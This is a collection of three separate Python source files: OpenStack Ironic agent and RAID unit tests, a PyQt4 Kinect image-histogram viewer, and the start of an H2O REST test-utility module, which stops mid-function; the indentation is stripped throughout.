@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_partition_image(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock, boot_mode_mock):
check_deploy_mock.return_value = None
uuid_mock.return_value = 'root_uuid'
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
boot_mode_mock.return_value = 'bios'
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = False
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
prepare_mock.assert_called_once_with(task.driver.boot, task)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
driver_int_info = task.node.driver_internal_info
self.assertEqual(driver_int_info.get('root_uuid_or_disk_id'),
'root_uuid')
uuid_mock.assert_called_once_with(self.passthru, task, 'root_uuid')
boot_mode_mock.assert_called_once_with(task.node)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_boot_none(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
self.assertFalse(prepare_mock.called)
power_off_mock.assert_called_once_with(task.node)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
driver_int_info = task.node.driver_internal_info
self.assertIsNone(driver_int_info.get('root_uuid_or_disk_id'))
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
self.assertFalse(uuid_mock.called)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_boot_error(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = "Error"
uuid_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
self.assertFalse(prepare_mock.called)
self.assertFalse(power_off_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
self.assertEqual(states.DEPLOYFAIL, task.node.provision_state)
self.assertEqual(states.ACTIVE, task.node.target_provision_state)
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'configure_local_boot', autospec=True)
@mock.patch.object(deploy_utils, 'try_set_boot_device', autospec=True)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_localboot(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock,
bootdev_mock,
configure_mock):
check_deploy_mock.return_value = None
uuid_mock.side_effect = ['root_uuid', 'efi_uuid']
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = False
boot_option = {'capabilities': '{"boot_option": "local"}'}
task.node.instance_info = boot_option
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
self.assertFalse(bootdev_mock.called)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = []
self.assertFalse(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_is_done(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'SUCCESS'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_did_start(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_multiple_commands(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'cache_image',
'command_status': 'SUCCESS'},
{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_other_commands(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'cache_image',
'command_status': 'SUCCESS'}]
self.assertFalse(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'SUCCESS'}]
self.assertTrue(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_empty_response(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = []
self.assertFalse(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_race(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'some_other_command',
'command_status': 'SUCCESS'}]
self.assertFalse(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_still_running(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertFalse(self.passthru.deploy_is_done(task))
class AgentRAIDTestCase(db_base.DbTestCase):
def setUp(self):
super(AgentRAIDTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_agent")
self.passthru = agent.AgentVendorInterface()
self.target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 0, 'is_root_volume': True},
{'size_gb': 200, 'raid_level': 5}
]}
self.clean_step = {'step': 'create_configuration',
'interface': 'raid'}
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
'target_raid_config': self.target_raid_config,
'clean_step': self.clean_step,
}
self.node = object_utils.create_test_node(self.context, **n)
@mock.patch.object(deploy_utils, 'agent_get_clean_steps', autospec=True)
def test_get_clean_steps(self, get_steps_mock):
get_steps_mock.return_value = [
{'step': 'create_configuration', 'interface': 'raid',
'priority': 1},
{'step': 'delete_configuration', 'interface': 'raid',
'priority': 2}]
with task_manager.acquire(self.context, self.node.uuid) as task:
ret = task.driver.raid.get_clean_steps(task)
self.assertEqual(0, ret[0]['priority'])
self.assertEqual(0, ret[1]['priority'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(task)
self.assertEqual(states.CLEANWAIT, return_value)
self.assertEqual(
self.target_raid_config,
task.node.driver_internal_info['target_raid_config'])
execute_mock.assert_called_once_with(task, self.clean_step)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_skip_root(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(
task, create_root_volume=False)
self.assertEqual(states.CLEANWAIT, return_value)
execute_mock.assert_called_once_with(task, self.clean_step)
exp_target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 5}
]}
self.assertEqual(
exp_target_raid_config,
task.node.driver_internal_info['target_raid_config'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_skip_nonroot(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(
task, create_nonroot_volumes=False)
self.assertEqual(states.CLEANWAIT, return_value)
execute_mock.assert_called_once_with(task, self.clean_step)
exp_target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 0, 'is_root_volume': True},
]}
self.assertEqual(
exp_target_raid_config,
task.node.driver_internal_info['target_raid_config'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_no_target_raid_config_after_skipping(
self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(
exception.MissingParameterValue,
task.driver.raid.create_configuration,
task, create_root_volume=False,
create_nonroot_volumes=False)
self.assertFalse(execute_mock.called)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_empty_target_raid_config(
self, execute_mock):
execute_mock.return_value = states.CLEANING
self.node.target_raid_config = {}
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.raid.create_configuration,
task)
self.assertFalse(execute_mock.called)
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final(
self, update_raid_info_mock):
command = {'command_result': {'clean_result': 'foo'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
raid_mgmt = agent.AgentRAID
raid_mgmt._create_configuration_final(task, command)
update_raid_info_mock.assert_called_once_with(task.node, 'foo')
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final_registered(
self, update_raid_info_mock):
self.node.clean_step = {'interface': 'raid',
'step': 'create_configuration'}
command = {'command_result': {'clean_result': 'foo'}}
create_hook = agent_base_vendor._get_post_clean_step_hook(self.node)
with task_manager.acquire(self.context, self.node.uuid) as task:
create_hook(task, command)
update_raid_info_mock.assert_called_once_with(task.node, 'foo')
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final_bad_command_result(
self, update_raid_info_mock):
command = {}
with task_manager.acquire(self.context, self.node.uuid) as task:
raid_mgmt = agent.AgentRAID
self.assertRaises(exception.IronicException,
raid_mgmt._create_configuration_final,
task, command)
self.assertFalse(update_raid_info_mock.called)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_delete_configuration(self, execute_mock):
execute_mock.return_value = states.CLEANING
with task_manager.acquire(self.context, self.node.uuid) as task:
return_value = task.driver.raid.delete_configuration(task)
execute_mock.assert_called_once_with(task, self.clean_step)
self.assertEqual(states.CLEANING, return_value)
def test__delete_configuration_final(self):
command = {'command_result': {'clean_result': 'foo'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.raid_config = {'foo': 'bar'}
raid_mgmt = agent.AgentRAID
raid_mgmt._delete_configuration_final(task, command)
self.node.refresh()
self.assertEqual({}, self.node.raid_config)
def test__delete_configuration_final_registered(
self):
self.node.clean_step = {'interface': 'raid',
'step': 'delete_configuration'}
self.node.raid_config = {'foo': 'bar'}
command = {'command_result': {'clean_result': 'foo'}}
delete_hook = agent_base_vendor._get_post_clean_step_hook(self.node)
with task_manager.acquire(self.context, self.node.uuid) as task:
delete_hook(task, command)
self.node.refresh()
self.assertEqual({}, self.node.raid_config)
| |
"""
Milton Orlando Sarria Paja
USC
Kinect and camera use
"""
import sys, os, random
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import matplotlib
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
import numpy as np
import matplotlib.pyplot as plt
import cv2
from matplotlib.animation import FuncAnimation
import threading
import time
##
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
import freenect
def read_img():
file_name = '/home/sarria/data/images_kinect/im3.npz'
npzfile = np.load(file_name)
img0 = (npzfile['arr_0']).astype(float)
return img0
##########################################################
##########################################################
class kinect_cam():
def __init__(self):
self.isopen = True
self.rgb = np.array([])
self.depth = np.array([])
self.convert_rgb = True
self.convert_depth = True
#function to get RGB image from kinect
def _get_video(self):
self.rgb,_ = freenect.sync_get_video()
if self.convert_rgb:
self.rgb = cv2.cvtColor(self.rgb,cv2.COLOR_RGB2BGR)
return
#function to get depth image from kinect
def _get_depth(self):
self.depth,_ = freenect.sync_get_depth()
if self.convert_depth:
self.depth = self.depth.astype(np.uint8)
return
#function is open??
def isOpened(self):
data = freenect.sync_get_depth()
if data is None:
self.isopen = False
return False
else:
return True
self.isopen = True
#function read depth camera
def read(self):
if self.isopen:
self._get_depth()
return self.depth
else:
return np.array([])
#function read rgb camera
def read_rgb(self):
if self.isopen:
self._get_video()
return self.rgb
else:
return np.array([])
##########################################################
#class capture(threading.Thread):
class capture():
def __init__(self,source=0,tRead=70):
#threading.Thread.__init__(self)
# Create the VideoCapture object and define default values
#self.cam = cv2.VideoCapture(source)
self.cam = kinect_cam()
self.m = 1.0
self.b = 0.0
self.read = True
self.stop = False
self.tRead = tRead/1e3
self.window = None
self.filterSize = 5
self.ap_mask=False
self.filter =True
#if not self.cam.isOpened():
# print "Video device or file couldn't be opened"
# exit()
self.img_g = self.cam.read()
#if len(img_g.shape)==3:
# self.img_g = cv2.cvtColor(img_g, cv2.COLOR_BGR2GRAY)
#self.img_g=read_img()
#
self.mask = 255*np.ones(self.img_g.shape)
#self.img_g.astype(float)
self.process()
return
#pre-process image
def process(self):
if self.ap_mask:
self.img_g = self.mask - self.img_g
self.img_g = self.img_g*self.m+self.b
#self.img_g[self.img_g<0]=0
#self.img_g[self.img_g>255]=255
if self.filter:
self.img_g = cv2.blur(self.img_g,(self.filterSize,self.filterSize))
return
def run(self):
#read from camera
#while True:
#while not(self.read):
# pass
self.img_g = self.cam.read()
#if len(img.shape)==3:
# self.img_g = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#img=read_img()
#
#self.img_g.astype(float)
self.process()
if not(self.window == None) :
self.window.on_draw(self.img_g)
#time.sleep(self.tRead)
###########
#if self.stop:
# break
#return
#function kill process
def kill(self):
self.stop=True
return
##########################################################
##########################################################
class secWindow(QMainWindow):
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
#Grid para graficar la imagen de forma apropiada
self.X = None
self.Y = None
self.grid = False
self.showImg= False
self.contour= True
#Generar el entorno grafico
self.setWindowTitle('Resultado')
self.sec_frame = QWidget()
self.dpi = 100
self.fig = Figure((8.0, 6.0), dpi=self.dpi)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.sec_frame)
self.axes = self.fig.add_subplot(111)
self.axes.set_autoscaley_on(True)
self.axes.get_yaxis().set_visible(False)
self.axes.get_xaxis().set_visible(False)
self.axes.set_yticklabels([])
self.axes.set_xticklabels([])
vbox = QVBoxLayout()
vbox.addWidget(self.canvas)
self.sec_frame.setLayout(vbox)
self.setCentralWidget(self.sec_frame)
#function draws image including contour
def on_draw(self,img_g):
""" Redraws image
"""
if self.showImg:
if not(self.grid):
x = np.linspace(255, 0, img_g.shape[1])
y = np.linspace(255, 0, img_g.shape[0])
self.X, self.Y = np.meshgrid(x, y)
self.grid=True
self.axes.clear()
if self.contour:
self.axes.contour(self.X, self.Y,img_g, self.levels, colors='black')
self.axes.imshow(img_g,cmap = 'jet', extent=[255,0,0, 255])
self.canvas.draw()
return
#function do not destroy window, just hide it, and do not waste time ploting
def closeEvent(self, event):
self.showImg=False
self.hide()
##########################################################
########### main window frame ###########################
##########################################################
class AppForm(QMainWindow):
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
self.setWindowTitle('Main: Modificar histograma')
self.minV = 0.0
self.maxV = 255.
self.m = 1.0
self.b = 0.0
self.img_obj= capture()
self.img0 = self.img_obj.img_g
#self.img_obj.start()
self.create_main_frame()
self.secW = secWindow(self.main_frame)
self.secW.levels = 6
self.img_obj.window = self.secW
self.timer = QTimer()
self.timer.timeout.connect(self.img_obj.run)
self.timer.start(70)
# self.timerStart = True
#function update histogram using current image
def updateHist(self):
self.axes1.clear()
self.axes1.axes.hist(self.img0.ravel(), 255, density=False, facecolor='g')
self.axes1.set_xlim(0, 255)
self.canvas.draw()
#function ubdate image in main frame using current image
def updateImg(self):
self.axes2.clear()
self.axes2.imshow(self.img0,cmap = 'jet', extent=[255,0,0, 255])
self.canvas.draw()
#function adjust parameters, apply mask, filter, slope, intercept,
#levels for contour plot.......
def adjustImg(self):
""" Update image
"""
self.img_obj.ap_mask = self.mask_cb.isChecked()
self.img_obj.filter = self.filter_cb.isChecked()
self.img_obj.m = self.m
self.img_obj.b = self.b
self.secW.levels = int(str(self.e1_levels.text()))
self.img_obj.filterSize = int(str(self.e2_filter.text()))
#time.sleep(0.070)
self.img0 = self.img_obj.img_g
self.updateHist()
self.updateImg()
return
#function when value in spinbox changes update values
def valuechange(self):
"""Updates y=mx+b
"""
self.minV = self.sp1.value()
self.maxV = self.sp2.value()
self.m = 255./(self.maxV-self.minV)
self.b = -(self.m*self.minV)
self.label_m.setText(str(self.m))
self.label_b.setText(str(self.b))
return
#function when close event.... ask yes or no?
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message',
"Exit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
self.img_obj.stop=True
self.secW.close()
event.accept()
else:
event.ignore()
#function start the secondary window and show the image
def iniciar(self):
'''shows result of adjusting image
'''
self.secW.showImg=True
self.secW.show()
return
#function apply layout
def create_main_frame(self):
self.main_frame = QWidget()
# Create the mpl Figure and FigCanvas objects.
# 5x4 inches, 100 dots-per-inch
#
self.dpi = 100
self.fig = Figure((5.0, 4.0), dpi=self.dpi)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.main_frame)
#
self.axes1 = self.fig.add_subplot(121)
self.axes1.set_autoscaley_on(True)
self.axes1.grid(True)
self.updateHist()
self.axes2 = self.fig.add_subplot(122)
self.axes2.set_ylim(-1, 1)
# Turn off tick labels
self.axes2.get_yaxis().set_visible(False)
self.axes2.get_xaxis().set_visible(False)
self.axes2.set_yticklabels([])
self.axes2.set_xticklabels([])
self.updateImg()
# Other GUI controls
#
self.label_pendiente = QLabel("pendiente: ")
self.label_m = QLabel(str(self.m))
self.label_intercepto = QLabel("Intercepto: ")
self.label_b = QLabel(str(self.b))
self.adjust_button = QPushButton("Ajustar")
self.connect(self.adjust_button, SIGNAL('clicked()'), self.adjustImg)
Lspace1 = QLabel("\t\t\t")
Lspace2 = QLabel("\t\t\t\t\t\t\t\t\t\t\t\t\t")
Lspace3 = QLabel("\t\t\t\t\t\t\t\t\t\t\t\t\t")
self.l1 = QLabel("Min:")
self.sp1 = QSpinBox()
self.sp1.setMinimum(0)
self.sp1.setMaximum(255)
self.sp1.setValue(0)
self.sp1.valueChanged.connect(self.valuechange)
self.l2 = QLabel("Max:")
self.sp2 = QSpinBox()
self.sp2.setMinimum(0)
self.sp2.setMaximum(255)
self.sp2.setValue(255)
self.sp2.valueChanged.connect(self.valuechange)
self.l3 = QLabel("Niveles: ")
self.e1_levels = QLineEdit()
self.e1_levels.setText('6')
self.l4 = QLabel("Filter size: ")
self.e2_filter = QLineEdit()
self.e2_filter.setText('5')
self.mask_cb = QCheckBox("Mascara")
self.mask_cb.setChecked(True)
self.filter_cb = QCheckBox("Filtro")
self.filter_cb.setChecked(True)
self.start_button = QPushButton("Iniciar")
self.connect(self.start_button, SIGNAL('clicked()'), self.iniciar)
#
# Layout with box sizers
#
hbox1 = QHBoxLayout()
for w in [ self.label_pendiente, self.label_m, self.label_intercepto, self.label_b]:
hbox1.addWidget(w)
hbox1.setAlignment(w, Qt.AlignVCenter)
hbox2 = QHBoxLayout()
for w in [ self.l1, self.sp1, self.l2, self.sp2, self.l3, self.e1_levels, self.l4,
self.e2_filter,self.mask_cb,self.filter_cb]:
hbox2.addWidget(w)
hbox2.setAlignment(w, Qt.AlignVCenter)
hbox3 = QHBoxLayout()
hbox3.addWidget(self.adjust_button); hbox3.addWidget(Lspace2);
hbox4 = QHBoxLayout()
hbox4.addWidget(self.start_button); hbox4.addWidget(Lspace3);
vbox = QVBoxLayout()
vbox.addWidget(self.canvas)
vbox.addLayout(hbox1)
vbox.addLayout(hbox2)
vbox.addLayout(hbox3)
vbox.addLayout(hbox4)
self.main_frame.setLayout(vbox)
self.setCentralWidget(self.main_frame)
##########################################################
##########################################################
def main():
app = QApplication(sys.argv)
form = AppForm()
form.show()
sys.exit(app.exec_())
if __name__ == "__main__":
main()
#self.axes2.spines['right'].set_visible(False)
| |
import sys, os, time, json, datetime, errno, stat, getpass, requests, pprint
if sys.version_info[0] < 3: import urlparse
else: import urllib.parse as urlparse
import h2o
debug_rest = False
verbosity = 0 # 0, 1, 2, 3
pp = pprint.PrettyPrinter(indent=4) # pretty printer for debugging
def setVerbosity(level):
global verbosity
if level: verbosity = level
def isVerbose():
global verbosity
return verbosity > 0
def isVerboser():
global verbosity
return verbosity > 1
def isVerbosest():
global verbosity
return verbosity > 2
def sleep(secs):
if getpass.getuser() == 'jenkins':
period = max(secs, 120)
else:
period = secs
# if jenkins, don't let it sleep more than 2 minutes
# due to left over h2o.sleep(3600)
time.sleep(period)
def dump_json(j):
return json.dumps(j, sort_keys=True, indent=2)
def check_params_update_kwargs(params_dict, kw, function, print_params):
# only update params_dict..don't add
# throw away anything else as it should come from the model (propagating what RF used)
for k in kw:
if k in params_dict:
params_dict[k] = kw[k]
else:
raise Exception("illegal parameter '%s' in %s" % (k, function))
if print_params:
print("%s parameters:" % function + repr(params_dict))
sys.stdout.flush()
######################
# Assertion-type stuff
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def followPath(d, path_elems):
for path_elem in path_elems:
if "" != path_elem:
idx = -1
if path_elem.endswith("]"):
idx = int(path_elem[path_elem.find("[") + 1:path_elem.find("]")])
path_elem = path_elem[:path_elem.find("[")]
assert path_elem in d, "FAIL: Failed to find key: " + path_elem + " in dict: " + repr(d)
if -1 == idx:
d = d[path_elem]
else:
d = d[path_elem][idx]
return d
def assertKeysExist(d, path, keys):
path_elems = path.split("/")
d = followPath(d, path_elems)
for key in keys:
assert key in d, "FAIL: Failed to find key: " + key + " in dict: " + repr(d)
def assertKeysExistAndNonNull(d, path, keys):
path_elems = path.split("/")
d = followPath(d, path_elems)
for key in keys:
assert key in d, "FAIL: Failed to find key: " + key + " in dict: " + repr(d)
assert d[key] != None, "FAIL: Value unexpectedly null: " + key + " in dict: " + repr(d)
def assertKeysDontExist(d, path, keys):
path_elems = path.split("/")
d = followPath(d, path_elems)
for key in keys:
assert key not in d, "FAIL: Unexpectedly found key: " + key + " in dict: " + repr(d)
###############
# LOGGING STUFF
# used to rename the sandbox when running multiple tests in same dir (in different shells)
def get_sandbox_name():
if "H2O_SANDBOX_NAME" in os.environ:
a = os.environ["H2O_SANDBOX_NAME"]
print("H2O_SANDBOX_NAME", a)
return a
else:
return "sandbox"
LOG_DIR = get_sandbox_name()
make_sure_path_exists(LOG_DIR)
def log(cmd, comment=None):
filename = LOG_DIR + '/commands.log'
# everyone can read
with open(filename, 'a') as f:
f.write(str(datetime.datetime.now()) + ' -- ')
# what got sent to h2o
# f.write(cmd)
# let's try saving the unencoded url instead..human readable
if cmd:
f.write(urlparse.unquote(cmd))
if comment:
f.write(' #')
f.write(comment)
f.write("\n")
elif comment: # for comment-only
f.write(comment + "\n")
# jenkins runs as 0xcustomer, and the file wants to be archived by jenkins who isn't in his group
permissions = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH
os.chmod(filename, permissions)
def log_rest(s):
if not debug_rest:
return
rest_log_file = open(os.path.join(LOG_DIR, "rest.log"), "a")
rest_log_file.write(s)
rest_log_file.write("\n")
rest_log_file.close()
######################
# REST API stuff
def list_to_dict(l, key):
'''
Given a List and a key to look for in each element return a Dict which maps the value of that key to the element.
Also handles nesting for the key, so you can use this for things like a list of elements which contain H2O Keys and
return a Dict indexed by the 'name" element within the key.
list_to_dict([{'key': {'name': 'joe', 'baz': 17}}, {'key': {'name': 'bobby', 'baz': 42}}], 'key/name') =>
{'joe': {'key': {'name': 'joe', 'baz': 17}}, 'bobby': {'key': {'name': 'bobby', 'baz': 42}}}
'''
result = {}
for entry in l:
# print 'In list_to_dict, entry: ', repr(entry)
part = entry
k = None
for keypart in key.split('/'):
part = part[keypart]
k = keypart
# print 'for keypart: ', keypart, ' part: ', repr(part)
result[part] = entry
# print 'result: ', repr(result)
return result
def validate_builder(algo, builder):
''' Validate that a model builder seems to have a well-formed parameters list. '''
assert 'parameters' in builder, "FAIL: Failed to find parameters list in builder: " + algo + " (" + repr(builder) + ")"
assert isinstance(builder['parameters'], list), "FAIL: 'parameters' element is not a list in builder: " + algo + " (" + repr(builder) + ")"
parameters = builder['parameters']
assert len(parameters) > 0, "FAIL: parameters list is empty: " + algo + " (" + repr(builder) + ")"
for parameter in parameters:
assertKeysExist(parameter, '', ['name', 'help', 'required', 'type', 'default_value', 'actual_value', 'level', 'values'])
assert 'can_build' in builder, "FAIL: Failed to find can_build list in builder: " + algo + " (" + repr(builder) + ")"
assert isinstance(builder['can_build'], list), "FAIL: 'can_build' element is not a list in builder: " + algo + " (" + repr(builder) + ")"
assert len(builder['can_build']) > 0, "FAIL: 'can_build' list is empty in builder: " + algo + " (" + repr(builder) + ")"
def validate_model_builder_result(result, original_params, model_name):
'''
Validate that a model build result has no parameter validation errors,
and that it has a Job with a Key. Note that model build will return a
Job if successful, and a ModelBuilder with errors if it's not.
'''
global pp
error = False
if result is None:
print('FAIL: result for model %s is None, timeout during build? result: %s' % (model_name, result))
error = True
elif result['__http_response']['status_code'] != requests.codes.ok:
error = True
print("FAIL: expected 200 OK from a good validation request, got: " + str(result['__http_response']['status_code']))
print("dev_msg: " + result['dev_msg'])
elif 'error_count' in result and result['error_count'] > 0:
# error case
print('FAIL: Parameters validation error for model: ', model_name)
error = True
if error:
print('Input parameters: ')
pp.pprint(original_params)
print('Returned result: ')
pp.pprint(result)
assert result['error_count'] == 0, "FAIL: Non-zero error_count for model: " + model_name
assert 'job' in result, "FAIL: Failed to find job key for model: " + model_name + ": " + pp.pprint(result)
job = result['job']
assert type(job) is dict, "FAIL: Job element for model is not a dict: " + model_name + ": " + pp.pprint(result)
assert 'key' in job, "FAIL: Failed to find key in job for model: " + model_name + ": " + pp.pprint(result)
def validate_grid_builder_result(result, original_params, grid_params, grid_id):
'''
Validate that a grid build result has no parameter validation errors,
and that it has a Job with a Key.
'''
global pp
error = False
if result is None:
